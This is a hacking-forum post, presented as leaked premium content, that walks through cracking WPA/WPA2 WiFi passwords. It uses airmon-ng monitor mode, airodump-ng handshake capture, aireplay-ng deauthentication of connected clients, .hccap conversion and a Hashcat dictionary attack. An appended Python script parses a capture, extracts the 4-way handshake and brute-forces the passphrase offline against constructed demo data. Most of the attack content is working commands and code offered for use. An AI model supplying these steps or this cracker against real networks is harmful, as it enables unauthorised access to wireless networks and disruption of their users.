







[Legion Leak] WPA Dictionary Attack and Hashcat Rules Part 1
This post is leaked from the premium section of "Legion" on the competing hack forum. There will be 5 new leaks a day. There may be some format problems due to UTF8 character encoding.


(07-10-2013, 01:19 PM)Greyhat.Infiltrator Wrote:
[Image: ieq6viOQ6szdE.gif]

In this tutorial, I will demonstrate how we can use both Windows and Linux to crack WPA/2 encryption.

The reason I am using both Windows and Linux is that my Linux OS is running in a virtual machine, and due to limitations of the hypervisor, virtual machines can't communicate directly with the graphics card itself. As a result, I will be using my Windows machine, which has an Nvidia GTX 465 graphics card, to do all the WPA/2 key cracking.

Another reason to use Linux is that the wireless injection drivers work better under Linux than under Windows. Even though it is possible to inject wireless frames under Windows, the hardware is very expensive and not many of us can afford it. I therefore highly recommend that you use Linux for this part of the tutorial.

I understand some of you out there have little or no experience using Linux. That's why I made this tutorial as simple as possible. If you follow it carefully and put some effort into it, you will succeed.

WARNING: Before you proceed with the steps below, you must ensure you have compatible hardware,
or there is no guarantee that things will work for you.


1) Compatible adapters

Alfa AWUS036H
Alfa AWUS036NHA

If your adapter is known to support packet monitoring and injection, you might as well just use it.
Otherwise you will need to purchase one of the adapters above.
Be aware that only USB adapters will work with VirtualBox; if you have a built-in or internal WiFi adapter, it will NOT WORK!

2) Compatible graphics cards

The AMD Radeon™ HD 7990 is highly recommended, but any other AMD Radeon™ HD card can also be used.
Warning: Make sure you use the Catalyst 13.1 drivers or Hashcat will not work.

The Nvidia GeForce GTX 690 is highly recommended, but any other GTX card can also be used.



Step 1

Download Virtualbox from this URL
( https://www.virtualbox.org/wiki/Downloads )


Step 2

Download Backtrack from this URL
( http://www.backtrack-linux.org/downloads/ )
Remember to download the Backtrack 5 R3 (x64, KDE) version.


Step 3

We need to set up our virtual machine so that we can install Backtrack on it.
The YouTube videos below will walk you through the process of setting up and installing Backtrack on your VM.


How to create a Virtual Machine?


How to install Backtrack 5 R3?


Step 4

Now we are going to download Hashcat and set up a working directory for it, along with wordlists.
( http://hashcat.net/oclhashcat-plus/ )

Once you've downloaded the Hashcat files, create a folder in the root directory of your C:\ drive and call it Hashcat. Then unzip all the files you've just downloaded in there. They should look like the screenshot below.

[Image: Untitled.png]


Step 5

Now we need to acquire our wordlists. The wordlists provided at the following URL are highly recommended.
Download whichever ones you can and save them into the Hashcat directory you've created.
If you require more wordlists, feel free to PM me!


( http://blog.g0tmi1k.com/2011/06/dictiona...lists.html )

Step 6

Let's get started. I am going to set up a target AP called "HackMe" and, for the sake of this tutorial,
I will create a very simple passphrase so that we can crack it successfully.

The wireless access point I am using is a NetGear N150 wireless router, WNR100 v3.
You can use any other brand or model of wireless router that pleases you.

Now head over to your virtual machine and fire up your Backtrack 5 OS.
Once it's up and running, connect your WIFI adapter to your host system and issue the following command:

Code:
lsusb

The above command should output the following, showing the type of WiFi adapter you are using.

[Image: adapter.png]

If you are not sure, or for some unknown reason your adapter isn't being detected by your VM, watch the video below.


Step 7

Provided there are no errors or issues, let's first put our WiFi card into monitor mode and then create a monitor-mode interface called "mon0". In your Backtrack 5 VM, open a terminal and type the following commands:

Code:
airmon-ng
Then
Code:
airmon-ng start wlan0

Your screen should look similar to the screen shot below.

[Image: airmon-ng.png]

Step 8

Now that our WiFi card is in monitor mode, we are going to use the airodump-ng utility to see which wireless networks are available to us.

In the terminal, type airodump-ng followed by the monitor interface. The monitor interface will be "mon0"; this can vary depending on your adapter chipset.

Code:
airodump-ng mon0

As you can see from the screenshot below, our WiFi adapter has picked up quite a few wireless networks, and our target AP "HackMe" is first on the list of available wireless networks.


[Image: airodump-ng.png]

Now that we have identified our target, let's instruct airodump-ng to monitor the "HackMe" wireless AP and record all the wireless traffic to a .cap file, so that we can capture the handshake we need to crack the WPA/2 key.


Code:
airodump-ng --channel <target's channel> --bssid <Target AP's MAC address> -w HackMe mon0

In order to capture the WPA handshake, we can wait for a client to authenticate to our AP, or we can deauthenticate a client that is already authenticated.

To deauthenticate a client, we use the Aireplay-ng utility which is part of the Aircrack-ng suite. The command is as follows:


Code:
aireplay-ng -0 10 -a <MAC address of target AP> -c <MAC address of targeted client> mon0

The video below will walk you through the process of capturing the traffic, deauthenticating the client, and verifying that you've captured a valid WPA handshake using Wireshark.



Step 9

Now that we know the WPA handshake is valid, we use the aircrack-ng utility to convert the HackME.cap file into a HackME.hccap file.
By default, Hashcat only takes its own .hccap file format. We can't use .pcap or .cap files, as they are not supported.


Converting the .cap file into .hccap is very simple. First, we run the ls command to verify that our HackMe.cap exists.

[Image: aircrack-ng1.png]

So HackME.cap exists; now we use the following command to convert our .cap file.


Code:
# -J takes the output name without an extension; aircrack-ng appends .hccap itself (HackME.hccap)
aircrack-ng HackME.cap -J HackME

[Image: aircrack-ng.png]

Aircrack-ng has now finished converting the .cap file. We now need to import the HackME.hccap file into our Windows machine, so that we can crack the WPA key with Hashcat.

To import the .hccap file, I will be using Dropbox. I will show you how the installation is done on the Linux side.
On the Windows side it should be a straightforward installation for a GUI guru like yourself.

Disclaimer

The Dropbox-on-Linux installation video was not published or created by me; full credit goes to its author.

Now let's put everything into practice.


Hashcat command:
Code:
cudaHashcat-plus64.exe -m 2500 HackMe-01.hccap rockyou.txt

Description:
-m 2500: the -m switch tells Hashcat what hash type to crack.
HackMe-01.hccap: the file containing the handshake.
rockyou.txt: our wordlist.
[Image: F4Z9Dqw.png]

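The capture-and-crack procedure in the post above, as an added example that is not part of the original post and not code from Aircrack-ng or Hashcat: a Python script that does offline, end to end, what Steps 8 and 9 plus the Hashcat command do. It checks a pcap for a usable 4-way handshake (the Wireshark verification the post defers to a video) and then runs the WPA2-PSK dictionary attack that `-m 2500` performs on the GPU. Everything it consumes is constructed in memory: the SSID "HackMe" is taken from the post, but the passphrase, MAC addresses, nonces and wordlist are made up. It assumes plain 802.11 frames (pcap LINKTYPE 105) with no radiotap header; a real airodump-ng capture may carry that header and would need it stripped first.

```python
"""Added example, not code from the post, Aircrack-ng or Hashcat: what the
capture-and-crack steps above amount to. Reads a pcap, extracts the EAPOL-Key
frames of the 4-way handshake, checks that a usable msg1/msg2 pair was captured,
then runs the dictionary attack hashcat -m 2500 runs on the GPU:
PBKDF2 -> PTK -> KCK -> MIC over message 2. The capture is built in memory from
made-up MACs, nonces and passphrase (assumes plain 802.11 frames, LINKTYPE 105,
no radiotap header)."""
import hashlib
import hmac
import struct

LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"   # LLC/SNAP header, ethertype 0x888e

# ---- IEEE 802.11i WPA2-PSK key derivation ---------------------------------
def pmk(passphrase: str, ssid: str) -> bytes:
    # PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output: the cost that makes this GPU work
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def ptk(pmk_: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces); KCK = ptk[:16]
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return b"".join(hmac.new(pmk_, b"Pairwise key expansion\x00" + data + bytes([i]),
                             hashlib.sha1).digest() for i in range(4))[:64]

def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    # Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1-128 over the frame with the MIC
    # field (16 bytes at offset 81) zeroed. Version 1 (WPA/TKIP) uses HMAC-MD5 instead.
    return hmac.new(kck, eapol[:81] + b"\x00" * 16 + eapol[97:], hashlib.sha1).digest()[:16]

# ---- pcap / 802.11 / EAPOL-Key parsing -------------------------------------
def eapol_key_frames(pcap: bytes):
    """Yield (addr1, addr2, eapol) for each 802.11 data frame carrying EAPOL-Key."""
    magic, *_, linktype = struct.unpack("<IHHiIII", pcap[:24])
    assert magic == 0xA1B2C3D4 and linktype == 105, "expected LINKTYPE_IEEE802_11 pcap"
    pos = 24
    while pos + 16 <= len(pcap):
        incl = struct.unpack("<IIII", pcap[pos:pos + 16])[2]
        frame, pos = pcap[pos + 16:pos + 16 + incl], pos + 16 + incl
        if (frame[0] & 0x0C) != 0x08:            # frame type 2 = data
            continue
        hdr = 26 if frame[0] & 0x80 else 24      # QoS data subtypes add a 2-byte QoS field
        if frame[hdr:hdr + 8] != LLC_SNAP_EAPOL:
            continue
        eapol = frame[hdr + 8:]
        if len(eapol) >= 99 and eapol[1] == 3:   # EAPOL packet type 3 = Key
            yield frame[4:10], frame[10:16], eapol

def classify(eapol: bytes) -> int:
    """Key Info flags -> handshake message number (0 = not a 4-way message)."""
    info = struct.unpack(">H", eapol[5:7])[0]
    ack, mic, install, secure = info & 0x80, info & 0x100, info & 0x40, info & 0x200
    if ack and not mic:
        return 1
    if ack and mic and install:
        return 3
    if mic and not ack:
        return 4 if secure else 2
    return 0

def find_handshake(pcap: bytes):
    """Crackable material if msg1 and msg2 share a replay counter (the check the
    post delegates to Wireshark); None if the handshake is incomplete."""
    msgs = {}
    for a1, a2, e in eapol_key_frames(pcap):
        msgs.setdefault(classify(e), []).append((a1, a2, e))
    for _sta, aa, m1 in msgs.get(1, []):         # msg1: AP (addr2) -> STA (addr1)
        for a1, spa, m2 in msgs.get(2, []):      # msg2: STA (addr2) -> AP (addr1)
            if a1 == aa and m1[9:17] == m2[9:17]:
                return dict(aa=aa, spa=spa, anonce=m1[17:49], snonce=m2[17:49],
                            eapol=m2, mic=m2[81:97])
    return None

def crack(hs: dict, ssid: str, wordlist):
    """Dictionary attack: recompute the msg2 MIC per candidate, return the match or None."""
    for cand in wordlist:
        kck = ptk(pmk(cand, ssid), hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return cand
    return None

# ---- constructed capture: demo data, not a real "HackMe" handshake ---------
def _eapol_key(info: int, counter: int, nonce: bytes) -> bytes:
    body = struct.pack(">BHHQ", 2, info, 16, counter) + nonce + b"\x00" * 50   # IV,RSC,ID,MIC,len
    return struct.pack(">BBH", 2, 3, len(body)) + body                        # EAPOL v2, type Key

def _data_frame(flags: int, a1: bytes, a2: bytes, a3: bytes, payload: bytes) -> bytes:
    return bytes([0x08, flags]) + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + LLC_SNAP_EAPOL + payload

def build_capture(ssid: str, passphrase: str, complete: bool = True) -> bytes:
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")   # made-up MACs
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                  # made-up nonces
    m1 = _eapol_key(0x008A, 1, anonce)                                       # Pairwise|Ack
    m2 = _eapol_key(0x010A, 1, snonce)                                       # Pairwise|MIC
    kck = ptk(pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    m2 = m2[:81] + eapol_mic(kck, m2) + m2[97:]                              # fill in the real MIC
    frames = [_data_frame(0x02, spa, aa, aa, m1)]                            # FromDS: AP -> STA
    if complete:
        frames.append(_data_frame(0x01, aa, spa, aa, m2))                    # ToDS: STA -> AP
    hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 105)
    return hdr + b"".join(struct.pack("<IIII", 0, 0, len(f), len(f)) + f for f in frames)
```

Two points the post's commands hide are visible here. The SSID is the PBKDF2 salt, so a handshake captured from "HackMe" will never crack under another network name, and any precomputed PMK table is only good for one SSID. And each candidate costs 4096 HMAC-SHA1 iterations before a single MIC comparison, which is the whole reason the post moves cracking out of the VM and onto a GPU. Running `find_handshake` on a capture with only message 1 returns None: that is the "incomplete handshake" case where deauthenticating a client (Step 8) and capturing again is the fix.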





Messages In This Thread
[Legion Leak] WPA Dictionary Attack and Hashcat Rules Part 1 - by BreShiE - 08-05-2013, 09:43 AM


